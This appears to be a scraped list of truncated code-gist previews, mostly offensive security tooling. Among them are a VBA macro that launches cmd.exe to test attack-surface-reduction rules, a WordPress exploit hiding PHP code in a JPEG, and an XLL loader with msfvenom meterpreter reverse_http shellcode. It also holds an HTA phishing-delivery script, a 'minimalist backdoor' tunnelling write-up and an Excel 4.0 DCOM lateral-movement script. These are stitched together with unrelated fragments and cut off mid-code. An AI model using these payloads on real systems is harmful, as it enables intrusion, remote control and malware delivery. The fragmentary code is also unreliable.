| #define _CRT_SECURE_NO_WARNINGS | |
| #include <ole2.h> // OLE2 Definitions | |
| #include <Windows.h> | |
| #include <stdio.h> | |
| HRESULT AutoWrap(int autoType, VARIANT *pvResult, IDispatch *pDisp, LPOLESTR ptName, int cArgs...) { | |
| va_list marker; | |
| va_start(marker, cArgs); | |
| if (!pDisp) { |
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

' Baseline case: starts cmd.exe as a direct child of the Office host process
' through the WScript.Shell COM object. Going by the sub's name, this is the
' launch that the ASR child-process rule is expected to stop.
' NOTE(review): usable as a control when validating the rule. If cmd.exe does
' appear, the rule is presumably disabled or in audit mode. Confirm against
' the endpoint's ASR configuration and event log.
Sub ASR_blocked()
    ' Late-bound shell object, used once and released at End With.
    With CreateObject("Wscript.Shell")
        .Run "cmd.exe"
    End With
End Sub
| # By @M3T4L5T3F | |
| # Change the values for a different experience. Works on laptops. A future update will add desktop monitor support | |
| $i=0 | |
| While ($true) | |
| { | |
| $i++ | |
| $brightness = Get-Random -Maximum 25 | |
| $delay = 0 |
| param( | |
| [Parameter(Mandatory)] | |
| [string]$Path | |
| ) | |
| #Created by Pierre.Audonnet@microsoft.com | |
| # | |
| #Got keytab structure from http://www.ioplex.com/utilities/keytab.txt | |
| # | |
| # keytab { |
| using System; | |
| using System.Text; | |
| using System.IO; | |
| using System.Net; | |
| using System.Net.Sockets; | |
| using System.Diagnostics; | |
| class Server { |
| var wpnonce = ''; | |
| var ajaxnonce = ''; | |
| var wp_attached_file = ''; | |
| var imgurl = ''; | |
| var postajaxdata = ''; | |
| var post_id = 0; | |
| var cmd = '<?php phpinfo();/*'; | |
| var cmdlen = cmd.length | |
| var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9'; | |
| var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd); |
| From the inside out, a minimalist backdoor. | |
| I'm a pretty big fan of the simple and elegant. In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a firewall, NAT and VPN. | |
| In this example we will use 3 tools. | |
| 1. Node | |
| 2. PowerShell | |
| 3. LocalTunnel | |
| While I have a full compact, custom version, I will not release this. |
| <# | |
| Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta | |
| To change your server, simply find and replace 192.168.1.1 with your server in the code. | |
| #> | |
| <# | |
| Moving Credits for CACTUSTORCH HERE | |
| I was in escape sequence hell ;-) | |
| ' ( ) ( ) |
| // Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll | |
| #include <Windows.h> | |
| __declspec(dllexport) void __cdecl xlAutoOpen(void); | |
| DWORD WINAPI ThreadFunction(LPVOID lpParameter) | |
| { | |
| // Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c" | |
| unsigned char b[] = | |
| "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" |
| <# | |
| Lateral movement and shellcode injection via Excel 4.0 macros | |
| Author: Philip Tsukerman (@PhilipTsukerman) | |
| License: BSD 3-Clause | |
| Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank - https://github.com/outflanknl/Excel4-DCOM | |
| #> | |
| function Invoke-ExShellcode | |
| { | |
| <# |